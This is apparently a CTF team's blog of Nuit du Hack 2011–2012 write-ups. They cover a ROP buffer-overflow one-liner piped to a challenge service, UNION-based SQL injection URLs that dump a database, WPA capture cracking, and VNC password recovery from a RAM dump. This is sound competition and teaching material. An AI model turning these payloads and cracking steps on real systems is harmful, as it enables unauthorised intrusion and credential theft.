To search

w3pwnz

w3pwnz, therefore we are

Tag - nuit du hack

Entries feed Comments feed

Tuesday, July 3 2012 12:03

NDH2k12 - Debriefing

baniere_ndh

We just participated in the "Nuit du Hack" CTFs the two last weekends. CTFs, with a "s", because there was two of them : a private and a public CTF. The 23 june was the "Nuit du Hack" event, and it was originally planned that the two CTFs take place here, in the same time, but unfortunately the public CTF was reported to the next weekend because of technical issues.



* Private CTF :

This was an attack/defense CTF ! Each team (13 in total) had a server with a dozen of services to patch/protect/attack.
We successfully exploited some webapp, and a so called "pastebin" challenge (a RCE caused by an overflow in a log parsing program), which played an important role in this CTF as we'll see :)

Unfortunately for us, at some time of the night (~ 3h30), almost all teams lost access to their VM, and without really knowing what was the cause of this situation, the staff decided to prematurely stop the CTF. So after validating our preciously keeped flags (~ 20 :p) we finished at the 2nd place with 4250pts, just behind HackerDom with 4960pts. This is not a bad score, but this left us with a slight taste of biterness when we latter learned what really happened : a team actually launched a fork bomb on the pastebin service (him again !) shutting down all the unpatched teams (More information : here(EN), here(EN), here(EN), here(EN), here(FR), here(FR) and here)

Since the pastebin was the one causing so much trouble, we wrote a little write-up that you can find here :)



scoreboard



* Public CTF :

So the public challenge was reported to the next weekend, and lasted 48h. This time it was a "classic" CTF, with some challenges to solve in categories like WebApp, Crackme, Forensics, Stegano or Crypto.
This time we finished 1st, with a total of 13710 points, by solving 23 out of 28 challenges \o/
You can find a few write ups here :



ranking_ndh_public.png



Sunday, March 25 2012 20:46

NDH2k12 Prequals - unknown binary, need your help - Strange binary file

From: Jessica <jessica@megacortek.com>
To: w3pwnz <w3pwnz@megacortek.com>
Subject: unknown binary, need your help
Attachments : executable1.ndh
Hello again,

Thank you very much for your help. It is amazing that our technical staff and
experts did not manage to recover any of it: the password sounds pretty weak.
I will notify our head of technical staff.

Anyway, I forwarded them the file for further investigation. Meanwhile, we got
fresh news from our mystery guy. He came along with an intersting binary file.
It just looks like an executable, but it is not ELF nor anything our experts
would happen to know or recognize. Some of them we quite impressed by your skills
and do think you may be able to succeed here. I attached the file, if you discover
anything, please send me an email entitled "Strange binary file".

This will be rewarded, as usual. By the way, your account has just been credited
with $100.

Regards,
Jessica.


We first noticed the two strings "Good password" and "Bad password" at the end of the file. An easy way to attack a crackme is to search for string references in the code. The disassembly from vmndh tells us that the "Bad password" string is loaded in 0x8480, and referenced from

0x82d4:
0x82d4: movl r0, #0x8480
0x82d9: call 0xffdd
0x82dd: ret


This is the "bad boy" case, and whatever "call 0xffdd" is, it must be the impression routine. There were two methods to get the actual adresses of the calls: check them in the debugger, or patch the disassembled output to translate relative calls into absolute ones. This is what patch.py does.

With it, we can see that the address 0x82d4 is called 9 times between 0x82e8 and 0x83e1, just after "jz" instructions.

A first test is made, that checks the length of the input:

0x82e8: mov r7, r0
0x82ec: movl r6, #0x840d
0x82f1: call 0x8003
0x82f5: cmpb r0, #09        ; 9 bytes (8 without "\x0a")
0x82f9: jz 0x0005
0x82fc: call 0x82d4         ; -> bad boy
0x8300: end


After that, each time the bytes pointed by r7 and r6 are xored together and compared to a hardcoded value. Then r7 and r6 are incremented:

0x8301: mov r0, [r7]
0x8305: mov r1, [r6]
0x8309: xor r0, r1
0x830d: cmpb r0, #78
0x8311: jz 0x0005
0x8314: call 0x82d4
0x8318: end
0x8319: inc r7
0x831b: inc r6


Let's load the program in the debugger and put a breakpoint at 0x8301, to see what these registers point to:

[BreakPoint 1 - 0x8301]
0x8301 > mov r0, [r7]
[Console]#> info reg
[r0]: 0061	[r4]: 0000
[r1]: 0000	[r5]: 0000
[r2]: 7fda	[r6]: 840d
[r3]: 001f	[r7]: 7fda
 
[bp]: 7ffa	[zf]: 0001
[sp]: 7fd8	[af]: 0000
[pc]: 8305	[bf]: 0000
[Console]#> x/x 7fda:8
0x7fda: 61 62 63 64 65 66 67 68     <- our input
[Console]#> x/x 840d:8
0x840d: 02 05 03 07 08 06 01 09     <- the key


According to the cmpb instructions, the result must be 78 44 73 6b 61 3e 6e 5e. The correct input is therefore

>>> format(0x7844736b613e6e5e ^ 0x0205030708060109,"x").decode("hex")
'zApli8oW'

Let’s use it:

~/ndh2012$ nc sciteek.nuitduhack.com 4001
Sciteek protected storage #1
Enter your password: zApli8oW
<PSP version="1.99">
<MOTD>
<![CDATA[
Welcome on SciPad Protected Storage.

The most secure storage designed by Sciteek. This storage protocol
allows our users to share files in the cloud, in a dual way.

This daemon has been optimized for SciPad v1, running SciOS 16bits
with our brand new processor.
]]>
</MOTD>
<FLAG>
ea1670464251ea3b65afd624d9b17cd7
</FLAG>
<ERROR>
An unexpected error occured: PSP-UNK-ERR-001> application closed.
</ERROR>
</PSP>

NDH2k12 Prequals - Another weird link - complex remote service

From: Piotr <piotr@megacortek.com>
To: w3pwnz <w3pwnz@megacortek.com>
Subject: Another weird link
Attachments : web3.ndh
Thank you again for these informations! we have just credited your account
with $1700. Our spy thinks that Sciteek staff is aware about the mole inside
their building. He is trying to read a private file named "sciteek-private.txt"
located at sciteek.nuitduhack.com:4005. Please find the .ndh attached, if
you are sucessfull, reply with a message entitled "complex remote service".

Of course, your efforts will be rewarded with $2500. Maybe you will find
pieces of informations about the mole.

Piotr


We disassembled it using the unlocked VM tool (cf. Unknown zip archive), and used the following python script to patch call format:

#!/usr/bin/env python
 
import sys
import re
 
def rel(line, size=4):
    fro, off = re.findall("0x([0-9a-f]{1,4})", line)
    ifro, ioff = int(fro, 16), int(off, 16)
 
    if ioff > 0x8000:
        ioff = ioff - 0x10000
 
    ito = ifro + 4 + ioff
    line = line.replace(off, format(ito, "04x"))
 
    return line
 
if __name__=="__main__":
    for line in open(sys.argv[1]).readlines():
        if " call" in line:
            print rel(line),
        else:
            print line,

Result:

[...]
0x8497: call 0x84ed
0x849b: mov r0, r2
0x849f: movl r1, #0x847c
0x84a4: movb r2, #0x03
0x84a8: call 0x80c0
0x84ac: cmpb r0, #00
0x84b0: jnz 0x0009
0x84b3: movl r0, #0x8400
0x84b8: call 0x8179
0x84bc: end
0x84bd: pushl #beef  ; Push a canary
0x84c2: nop
0x84c3: mul r2, r4
0x84c7: nop
0x84c8: .byte 0x00
0x84c9: .byte 0x00
0x84ca: .byte 0x00
0x84cb: mov r1, r8
0x84cf: movl r2, #0x03fc  ; Read 1020 bytes
0x84d4: call 0x81d8
0x84d8: mov r0, r1
0x84dc: addl r8, #0200
0x84e1: pop r1
0x84e3: cmpl r1, #beef
0x84e8: jz 0x0001
0x84eb: end
0x84ec: ret
0x84ed: subl r8, #0200 ; Reserve 512 bytes
0x84f2: call 0x84bd
0x84f6: addl r8, #0200                                                
0x84fb: ret

We begin with the call @0x8497, follow it to 0x84ed where 512 bytes are reserved on the stack. A fixed canary “0xbeef” is then pushed on the stack, it calls the following function: read()

So sys_read is invoked, with a specified size of 1020 (0x84cf: movl r2, #0x03fc). There is an obvious buffer overflow. Unfortunatly (but that’s moar fun), the stack is not executable because of NX bit:

% python -c 'print "A"*512+"\xef\xbeBBCC"'|nc sciteek.nuitduhack.com 4005
[!] Segfault 0x4242 (NX bit)

We assumed ASLR was on and no PIE, let’s ROP :)

We want to proceed as below:

movl r3, #0x20
movl r2, #0x2000
movl r1, #0
movl r0, 3
syscall                         ; read
mov r1, r2 
movl r2, #0
movl r0, #2
syscall                         ; open
mov r1, r0
movl r2, #0x3000
movl r3, #0x1024
movl r0, #3
syscall                         ; read
mov r3, r0
movl r1, #1
movl r0, #4
syscall                         ; write

Our ROP gadgets:

; READ
[0x8172]
        0x8172: pop r3
        0x8174: pop r2
        0x8176: pop r1
        0x8178: ret
[0x81e4]
        0x81e4: movb r0, #0x03
        0x81e8: syscall
        0x81e9: ret
 
; OPEN
[0x8174]
        0x8174: pop r2
        0x8176: pop r1
        0x8178: ret
[0x81d2]
        0x81d2: movb r0, #0x02
        0x81d6: syscall
        0x81d7: ret
 
; READ
[0x8172]
        0x8172: pop r3
        0x8174: pop r2
        0x8176: pop r1
        0x8178: ret
 
[0x81e0]
        0x81e0: mov r1, r0
        0x81e4: movb r0, #0x03
        0x81e8: syscall
        0x81e9: ret
 
; WRITE
[0x818f]
        0x818f: movb r1, #0x01
        0x8193: movb r0, #0x04
        0x8197: syscall
        0x8198: pop r1
        0x819a: pop r0
        0x819c: ret

ROP Payload:

0x8172
0x14
0x2000
0x0
 
0x81e4
 
0x8174
0x0
0x2000
 
0x81d2
 
0x8172
1024
0x3000
0xdead
 
0x81e0
 
0x818f

We then fill the first read (0x3fc bytes) with junk:

‘Z’ * (0x3fc - len(payload) - 512)

And our file: “sciteek-private\x00”.

So, our buffer overflow is as follows: [JUNK][CANARY][ROP PAYLOAD][JUNK][FILENAME]

Finally our python one-liner:

python -c 'from struct import pack; print "A"*512+"\xef\xbe"+"".join(pack("<H", i) for i in [0x8172, 0x14, 0x2000, 0x0, 0x81e4, 0x8174, 0x0, 0x2000, 0x81d2, 0x8172, 0x1024, 0x3000, 0xdead, 0x81e0, 0x818f])+"Z"*0x1dc+"sciteek-private.txt\x00"'|nc sciteek.nuitduhack.com 4005
 
Dear Patrick,
 
We found many evidences proving there is a mole inside our company who is selling confidential materials to our main competitor, Megacortek. We have very good reasons to believe that Walter Smith have sent some emails to a contact at Megacortek, containing confidential information.
 
However, these emails seems to have been encrypted and sometimes contain images or audio files which are apparently not related with our company or our business
, but one of them contains an archive with an explicit name.
 
We cannot stand this situation anymore, and we should take actions to make Mr Smith leave the company: we can fire this guy or why not call the FBI to handle this case as it should be.
 
Sincerely,
 
David Markham.
[!] Segfault 0x5a5a (NX bit)

NDH2k12 Prequals - Any idea how to use this file? - Unknown file extension

After decrypting the secret message, we got a new email, from Piotr this time, a supposed technical operative.

From: Piotr <piotr@megacortek.com>
To: w3pwnz <w3pwnz@megacortek.com>
Subject: Any idea how to use this file?
Attachments : webApp.ndh
Hi

Great job there! You seem to be quite a great cryptograph, wow. Your account has been credited with $100. Btw, I'm Piotr, from the technical staff. Maybe Jessica told you about me, we will interact directly about complex questions.

Anyway, our anonymous contact at Sciteek has sent us another binary file with that strange extension, will you be able to break it? If you manage so, please contact me directly with the subject "Unknown file extension", $1700 dollars to earn!

KR
Piotr


As you can see, he asks us to study a file which format and extension are unknown.
The file is pretty small (897 bytes), and contains some strings :

# strings webApp.ndh
.NDH{
Welcome on Sciteek' SciPad secure shell !
Please enter your passphrase:
Nope. It is not the good password
sciteek.nuitduhack.com:4000
LxTBh9pv.txt


We can easily recognize the other strings as coming from the pseudo-assembly code decrypted. A quick look at it shows a blatant 10-bytes read while the function frame is only 8-bytes long. We can quickly check this buffer overflow on the online service:

# nc sciteek.nuitduhack.com 4000
Welcome on Sciteek' SciPad secure shell !
Please enter your passphrase: 0123456789
[!] Segfault 0x3938 (opcode unknown)


From the plain ASM, we also spot a debug function whose job is to display the “esoasoel.txt” file, obvious candidate for our BoF. From there on, two options: bruteforcing the possible return addresses or reversing the file format to find the actual offset of the debug function.

Step 1 : The Easy Way


The address space is only 16-bits long and we haven’t enough place for a shellcode anyway: we chose to bruteforce it - at the time, we did not have the NDH virtual machine from the rar archive to directly get the correct offset. The only trick here is to think about injecting 9 bytes instead of 10 to get the heavy-weighted one:

$ perl -e 'print "A"x9' | nc sciteek.nuitduhack.com 4000
Welcome on Sciteek' SciPad secure shell !
Please enter your passphrase: [!] Segfault 0x8241 (opcode unknown)


The assembly suggests that the debug function we are looking for is farther ahead in the code segment than the call :ask_password, so we launched a bruteforce from 0x8200 to 0x83ff included.
Finally, Ezekiel 25:17 pops up:

# python -c "print 'A'*8+'\xdb\x82'" | nc sciteek.nuitduhack.com 4000

Welcome on SciPad Shell, root.

The path of the righteous man is beset on all sides by the inequities of the selfish and the tyranny of evil men. 
Blessed is he who, in the name of charity and good will, shepherds the weak through the valley of darkness, for he is truly his brother's keeper and the finder of lost children. 
And I will strike down upon thee with great vengeance and furious anger those who would attempt to poison and destroy My brothers. 
And you will know My name is the Lord when I lay My vengeance upon thee.

- God (f98eb53e7960c9a663c60a916b6de70e)

Be careful, this service is not protected by any option, to avoid exploitation please use the new version of this shell available on sciteek.nuitduhack.com:4004. 
This service runs in a vm with stack layout randomization which is more secure

Something's fucked up ('cause our developers drink too much beer).
Try later. Or not.


Step 2 : The hard way, ‘cuz you’re a grown up and all.


First we have to study the binary. So hex editor it is.
ndh_webapp_hdr

The first four bytes indicate the file type, here NDH. The two following bytes indicate the size of the code and data section : the end offset is 0x37F, and 0x37F - FILE_TYPE_FIELD_SIZE (4) = 0x37B.

The data section is localized at the end of the file :

ndh_webapp_datas

We recognize the strings from the pseudo ASM code with a little difference : the name of the text file.

Now we have to find the function that displays the file content. Thanks to the Scios Instruction Set we extracted from the audio file, we know that the binary is mapped at the 0x8000 address. We manually compile the following statement :

.LABEL TEMP_ROUTINE
  MOVL R0, :FLAG_FILE
  CALL :DISP_FILE_CONTENT
  END


MOVL R0, :FLAG_FILE give us the following opcodes :

MOV    REG_DIRECT16 FLAG    R0    FILE NAME ADDR LITTLE ENDIAN
04     02                   00    6e 83


The filename address is calculated by adding the filename offset in the file (0x374 - HDR_SIZE(6)) to the memory base address (0x8000) which give us 0x836E.
We can’t fully compile the next statement, because we don’t know where is the DISP_FILE_CONTENT function, however we know the compiled statement will be something like that :

CALL    DIRECT16 FLAG    FUNCTION ADDRESS
19      04               XX XX


Consequently, we can look for the followings bytes in the binary :

04 02 00 6E 83 19 04


ndh_webapp_displayfile

And we find them at the file offset 2E1 that we translate into memory address :

0x8000 + 0x2E1 - 0x6 (HDR_SIZE) = 0x82DB.


No surprise here, this is the address we found by bruteforcing the BoF. Well, that’s it.

NDH2k12 Prequals - We are looking for a real hacker - Wallpaper image

WallpaperImage.png
The bmp file has no padding bytes, and its size matches the image dimensions (4374054 = 810*1800*3 +0x36 for the header).
On the other hand, applying an LSB filter reveals that something is wrong on the left side of the image (the 630 first columns from the left look filled with random bits).
lsbsp113.png
The three colors are affected in the same way, and the second LSB is normal. So, we certainly have an LSB encoding with one bit per byte.

The fact that the bits form a rectangle suggests the encoding was done following the image order rather than the file order. The two most logical choices (for occidentals) are left-to-right and up-to-down. I was going for the former; the grace of the random Bug made me do the latter first.

Here is how the data begin:

00 02 eb 9b 78 9c d4 b9 65 54 ...


The index of coincidence reveals a flat distribution. The data could be either encrypted or compressed. But then, the two first bytes are suspiciously low.
0x2eb9b (191387) is also very close to the rectangle size: 630*810*3 / 8 = 191362. And as it happens, 78 9C is a typical beginning for strings compressed with zlib (deflate algorithm).

Quote from http://garethrees.org/2007/11/14/pngcrush/ :

The header byte 78 meaning “deflate compression with a 32 KiB window”.
The informational byte 9c meaning “the default compression algorithm was used” (plus a checksum).”


So all that has to be done is to extract the least significant bits in column-major (up-to-down), skip the first four bytes indicating the size of the file, and decompress the rest with zlib.

The output file is a pdf describing a few products from SCIOS. This file is the flag.

#!/usr/bin/python
import sys, zlib,Image, struct
 
bmp = Image.open("sp113.bmp")
pix = bmp.load()
lsb = []
for x in range(640):
    for y in range(810):
        lsb.extend( str(i&1) for i in pix[(x,y)] )
lsb = "".join(lsb)
lsb = "".join(chr(int(lsb[i:i+8],2)) for i in range(0,len(lsb),8))
length = struct.unpack(">I",lsb[:4])[0]
pdf = zlib.decompress(lsb[4:4+length])
outfile = open("sp113.pdf","wb") #"b" is for windows users
outfile.write(pdf)
outfile.close()



chuck_bmp.jpg

NDH2k12 Prequals - We are looking for a real hacker - Unknown text

UnknownText.png
File sp111

After opening the sp111 text file, we guessed that it was encrypted with vigenere.

We tried an auto-decrypt with http://www.apprendre-en-ligne.net/crypto/vigenere/decryptauto.html, revealing that “OFJZUANDEOQDK” would be the most probable key.

We reconstructed the following plain text :

; HI,
 
; I WAS DISCRETELY WANDERING AROUND AS USUAL YESTERDAY. A COUPLE OF
; SYSTEM DEVELOPPERS WERE SHOUTING ABOUT CORPORATE DEVICES QUALITY
; DECREASING EVERY YEAR WHEN THEY FINALLY AGREED ABOUT USING LOCAL
; NETWORK TO TRANSFER SOME PICTURES. FROM THE DEAD USB KEY I MANAGED
; TO RECOVER FROM THE TRASHCAN AND TO CLEAN, I FINALLY EXTRACTED A
; COUPLE OF MEGABYTES OF UNALTERED DATA. WORTHLESS CORPORATE
; MAILS, PERSONAL PICTURES I DECIDED TO KEEP FOR MY PRIVATE USE AND FEW
; INTERESTING FILES, ESPECIALLY SOME ASM SOURCE CODE THAT YOU MIGHT
; FIND VALUABLE. I ATTACHED ONE OF THEM, PLEASE CONTACT ME IF YOU WOULD
; LIKE ANY FURTHER INVESTIGATION ABOUT THOSE PIECES OF CODE.
 
; TEST PROGRAM #1 - BUILD #35 FOR SCIPAD
; HTTP://SCITEEK.NUITDUHACK.COM
 
; SOME INCLUDES #INCLUDE INC/STDLIB.INC
 
; THIS ROUTINE ASKS FOR A PASSWORD AND PUT THE ADDRESS IN R5 AND THE SIZE IN R0
 
.LABEL ASK_PASSWORD
   ; DISPLAY A PROMPT
   MOVL R0, :PWD_MSG
   CALL :PRINT
 
   ; ALLOCATE SOME SPACE ON STACK
   SUBB SP, #8
   MOV R5, SP
   MOVL R0, STDIN
   MOV R1,  R5
   MOVB R2, #10
 
   ; READ THE PASSWORD FROM STDIN
   CALL :READ
 
   ; RESTORE THE STACK POINTER
   ADDB SP, #8
 
   ; RETURN
   RET
 
; OUR MAIN
;
; BASICALLY, THIS PROGRAM DOES NOTHING USEFUL ... IT IS JUST A SAMPLE ;)
 
.LABEL MAIN
   ; DISPLAY A WELCOME MESSAGE
   MOVL R0, :WELCOME
   CALL :PRINT
 
   ; ASK FOR A PASSWORD
   CALL :ASK_PASSWORD
 
   ; DISPLAYS AN ERROR
   MOVL R0, :ERROR
   CALL :PRINT
 
   ; QUIT
   END    
 
; TEMP ROUTINE (NOT USED ANYMORE)
 
.LABEL TEMP_ROUTINE
   MOVL R0, :FLAG_FILE
   CALL :DISP_FILE_CONTENT
   END
 
.LABEL WELCOME
.DB "WELCOME ON SCITEEK' SCIPAD SECURE SHELL !",0X0A,0
 
.LABEL PWD_MSG
.DB "PLEASE ENTER YOUR PASSPHRASE: ",0
 
.LABEL ERROR
.DB "NOPE. IT IS NOT THE GOOD PASSWORD",0X0A,0
 
.LABEL HINT
.DB "SCITEEK.NUITDUHACK.COM:4000",0
 
.LABEL FLAG_FILE
.DB "ESOASOEL.TXT",0

NDH2k12 Prequals - New email from our contact - Sciteek shortener

Newemailfromourcontact.png

According to the description http://sci.nuitduhack.com was a url shortening service.

After searching about how these services work i found two “common” practises.

The first was inserting urls in the database and then transforming the ID of that record to Base36 (letters a-z digits 0-9) or some other custom encryption and using it as an alias. But since the alias in the link given had both uppercase, lowercase characters and digits the transformation must be Base62 or it was using some other way to map aliases to urls. Base62 didn’t give us any results so we moved towards the second way of mapping.

That was entering the alias and url in separate fields in the database. So the alias was taking part in an sql query that could be prone to SQL Injection and thus our way in.

Testing this idea with

http://sci.nuitduhack.com/’ UNION SELECT @@version-- a%%%

gave us the first result. The version of the database was returned in the url so alias was passed unfiltered.

Now we just had to find the table and column names.

Some queries to information_schema did the trick:

http://sci.nuitduhack.com/' UNION SELECT CONCAT(table_name,' ',column_name) FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema' LIMIT 0,1-- a

returns shortner id

http://sci.nuitduhack.com/' UNION SELECT CONCAT(table_name,' ',column_name) FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema' LIMIT 1,1-- a

returns shortner alias

http://sci.nuitduhack.com/' UNION SELECT CONCAT(table_name,' ',column_name) FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema' LIMIT 2,1-- a

returns shortner url

Next was to find out how many ids are in the table.
Asking the polite database

http://sci.nuitduhack.com/' UNION SELECT CONCAT(min(id),' ',max(id),' ',count(*)) from shortner-- a

answered with 33 43 11 so there are 11 records in the database starting with id 33 up to 43.
So no need for a bruteforcer to get all records.

The precious flag was in id 40

http://sci.nuitduhack.com/' UNION SELECT CONCAT(url,' ',alias) FROM shortner WHERE id=40-- a


http://sci.nuitduhack.com/mMVzJ8Qj/flag.txt 5867hjgjhgffdedeseddf7967

b92b5e7094c7ffb35a526c9eaa6fab0a



Bonus url :

http://sci.nuitduhack.com/f69148e2 Google

http://sci.nuitduhack.com/7e3aacb2 http://www.hackerzvoice.com

http://sci.nuitduhack.com/1596a271 http://www.bonjourmadame.fr

http://sci.nuitduhack.com/9d0e9373 http://www.bonjourvoisine.fr

http://sci.nuitduhack.com/83df9275 http://www.lkcd.net :?

http://sci.nuitduhack.com/732c1d61 https://www.google.fr/search?q=the+answer+to+life+the+universe+and+everything

http://sci.nuitduhack.com/342d1fff CTF Ranking

http://sci.nuitduhack.com/zomgwtf Rickrolling ;-)

http://sci.nuitduhack.com/trololololololololololololo http://trololololololololololo.com/

http://sci.nuitduhack.com/admin-backend-full WTF !?

NDH2k12 Prequals - What is it about this file ? - Mole Information

MoleInformation.png

In the sp113.pdf found in the bitmap “Wallpaper image”, we can see “author: SciteekSmith”.

Google is our friend : http://lmgtfy.com/?q=SciteekSmith

There is 1 result : http://www.facebook.com/SciteekSmith

facebook.png

NDH2k12 Prequals - Time is running out - captured file

mail_captured_file.png

There is one file : sciteekadm.cap
It’s a 802.11 capture.

Let’s crack it with aircrack-ng and a wordlist.

aircrack.png

Then we decrypted the capture with Cain.

cain.png

We opened the decrypted capture with Wireshark.

wireshark.png

We can see a png file.

We extracted it and we got the flag.

flag_captured_file.png

Wednesday, April 6 2011 01:17

NDH2k11 Prequals - Compte Rendu !

Le week end dernier, se sont déroulées pendant 48h, les préqualifications du CTF de la Nuit Du Hack 2011 !

ndh.png

Les consignes étaient claires :

 * Les 10 premières équipes seront qualifiées d'office pour le CTF, et gagneront leurs entrées gratuites
 * Elles seront ensuite complétées par 5 équipes (choisies par hzv ? ou sur liste d'attente surement)
 * Il y aura 12 challenges répartis dans les catégories Web, Crypto, Forensics et Reverse
 * Les prequals seront ouvertes du samedi 02 00:00 au dimanche 03 23:59

Nous avons donc participé, sous le nom de team "404NameNotF0und", composée pour l'occasion de : awe, Ufox, mirmo, BAAL, ymvunjq, MaZ, ThunderLord, et NiklosKoda ! C'était le premier CTF de ce type pour beaucoup d'entre nous, et on peut dire que cela a été très enrichissant pour tous !

Nous avons publiés les writes-up des épreuves dans les billets suivants :

Un très bon bilan donc, puisque nous avons validé toutes les épreuves, et que celles ci étaient toutes assez intéressantes et fun, et même bien corsées pour certaines :p. Au final, nous terminons 7ème au classement (les teams devant nous ayant eu plus de bonus de points pour avoir validé des épreuves en premier, même si quelques unes d'entre elles ont terminé l'ensemble des épreuves après nous).

ndh_ranking.png

Un grand merci à HZV, et au 18 juin donc, pour le CTF ;)

UPDATE 1 : un compte rendu officiel, sur le site de HZV.

UPDATE 2 : Nous venons de recevoir un mail de HZV :

As a result of your participation to NDH2k11 CTF prequals that took place last weekend,
we are proud to announce that your team ended up in position #7.
Please find your 5 free entrances to Nuit Du Hack that will take place on June 18th 2011

\o/

Tuesday, April 5 2011 21:33

NDH2k11 Prequals - Forensic100

Support : image RAW

But : “On a dump la RAM d'une machine sur laquelle tournait un serveur VNC. Le but est de récupérer le mot de passe de ce serveur.”

Après quelque recherches, on apprend que le mot de passe VNC est stocké de manière cryptée dans la base de registre ici : “HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC\Password”

On trouve rapidement sur le net, un programme qui permet de décrypter un pass VNC crypté : VNCpwdump

Le but est donc de retrouver dans le dump mémoire la clé de registre correspondante et de la décrypter.

On tente d'ouvrir le fichier .raw dans volatility :

D:\Challenges\NDH\Volatility-1.3_Beta>python volatility ident -f dump.raw
             Image Name: dump.raw
             Image Type: Service Pack 2
                VM Type: pae
                    DTB: 0xae2000
               Datetime: Thu Mar 10 14:28:56 2011

Le fichier est bien identifié et en parcourant la Documentation , on s’aperçoit qu'il est possible avec la version 1.4 de volatility d'ouvrir directement une clé de registre. Après installation, il n'y a plus qu'à lancer la bonne commande :

C:\Users\K-Lu\Desktop\Volatility-1.4_rc1>python vol.py printkey -f dump.raw -K RealVNC\WinVNC4

Volatile Systems Volatility Framework 1.4_rc1
Legend: (S) = Stable   (V) = Volatile
----------------------------
Registry: \Device\HarddiskVolume1\WINDOWS\system32\config\software

Key name: WinVNC4 (S)
Last updated: 2011-03-10 13:10:51
Subkeys:
Values:
REG_BINARY    Password        : (S)
0000   DA 6E 31 84 95 77 AD 6B                            .n1..w.k
REG_SZ        SecurityTypes   : (S) VncAuth
REG_SZ        ReverseSecurityTypes : (S) None
REG_DWORD     QueryConnect    : (S) 0
REG_DWORD     QueryOnlyIfLoggedOn : (S) 0

Nous retrouvons donc bien le pass VNC crypté : DA 6E 31 84 95 77 AD 6B, plus qu'à le décoder avec VNCpwdump :

D:\Hacking\Tools\VNCpwdump>vncpwdump.exe -k DA6E31849577AD6B

VNCPwdump v.1.0.6 by patrik@cqure.net
-------------------------------------
Password: secretpq

Et voilà il n'y avait plus qu'à rentrer le flag.

NDH2k11 Prequals - Crypto100

La première crypto était sans nul doute le challenge le plus simple de ces pré-qualifications, elle se présentait sous la forme d'un fichier texte du nom de lorem.txt

Lorem faisant clairement référence au Lorem Ipsum, texte de remplissage de faux site très connu.

Voici le cipher :

NFPTF WAWMG SSCQY AMG CDCI, WIT TWFAIEVLAUHG GYGMICMWHI GFPZMUHCK KPLGL ZWHTRRVPA RRE, LPCT GPH JBDRTWZ ZMFWJ GPVIWMK. OAXIKJQIF PVA CXEFI KUEMVP PXWHO, ESCV JTZSGJW MQSCTGCKC SNW DYKWXTZV AZMFVZOJX, BPUMY BYJ GB MXVCD, KPZBL JSWXPZUPA PNELQ SBOX. WMMEIEFPAWR UTCAXFTWIOT PVEACW NTTS JM. ALWKU RSEXHTPVU VQI LOAMWH TVRV BB, XVPTGSNBE PGLTQ RNPYYNO, ZB PM DSEKYAPLU HZGH CK CABH, XEYHP HFPLK ERPVYC OSYIFUIMJ GA CVAC, DMCMSD IM MTH. CGJBYF ORSGBG DGWFTVZUXCI FKK NTWS DIV YI, WLUWMRQKJQT NH QIJGTRKWT AGRNVPXLEFI, WN SMTVBUWG XFJJMDLX VCVRZUZQQ NPKC CNBN QGFAMJ, GYIX FGD GS KWDYK GPYIKZ. XVBKE NGHWY, SVCD RVE WPEEGKPP GCY, TJYIMLO WWVGC DCING ASJNP EIEB QH QQCMG, VCCTGLXW CGV, NVVPXGAEO L. ZWBXGLNH DSYWKNPM HPPDOH QFNSQW NGECPG O AIJ, NDVKQY KSAFZKTGHFQ FIC, MDRLZHVGK YCMS PWL UAMHWLB TEQZBTGH, TRLYGHLO ACVCKJ HJLHZ MHMJQ DCNVE RW CGQXFZ. WAN KMKCL, I HVCD DTNUTEL ZTPZU UQFU HRAXEWDMK PJPGWAIXR, ULQRBDTX NYCIECAQW HNCYBVCCTWL KMKCL, MKRV ECFNS GIKNXFLNBU PNELQ TKOE QGHIIJ. ULL HNRZZJL EFMK MTH FFPW.

MAVVETK QZRMVXE UQUMG RPZK JM ALYJCH, SIEP UEHTZQ CBPS PSWJW UKHU IH, CK YBXH XM, DYRXLU HUIG GEGB OWEEW JTHV UBAGVRZR. QEOYHAN BECGZCEQC, GCAESYXWMFYV KU WVACIC BNG NVSM VVRXPLE, FKK CVXH QIDCH AZUP. CPGTZAXXG TR KYS ELIBM HVIEGHLWX, QSFTWLCKI WNIZRIBG DML, YVIJVHA WBFRJTL QZRYOT GFOTWHB KERTZSC. UMCH ZZVHM HVEKSB HRTS WN TX, RF HLMCKJAXGU ASKOTVV, UVLEYGJ ZATBOMLCXW NKZQ ITGK LJEZL SJWX. JLUJM QBTSG FNWD QGFAMJ C UCRP, CVLTTB TR DCVYCC XCMF, OFJABG EIDFJW AWZBS RIVR GNHCYE, OI HZIUQWFKD RXGQTHMHI HLKZ DIAGEYIBG. DEHCTR JCWQIA NZRDKO DYKJTRUKZAI CTVRXNA, DIV JTRRVPJYF, OFJTLHTI MFIVZELA ZHNGSITHP RGH JX VTVA XROGSH. NZEVAWXIJ OP MX NOVR. BB JZPMNEEK CKQTVUTGCZ SCEL WDRUKTMRGWD LDG JPP. NCIEV KHKYYKJ, LDG EFMK CC HZIUQWFKD OJTA TR. NYHXZDBTYZ UVB UTINMTOH JRWJQFHU MGKTAFW, KOHGZRPB TEGKGJF, BFPDU HEGKLV MQ SLGHJIP, JWLBIEVBU QV VVKEHF XEKMP QVVBA. YG FRNXUID SJHPVV PBVG IKKYT BDDYE YAMK, DPJIAFLK XW FTWMM BELTPA MA. FZYB ICCXLCISI GYWW FEVJTKWDUMY KIC XPDEZWJ, GS BB NSFMTGKGACIE CVLTTB OMUNJQ RPAM.

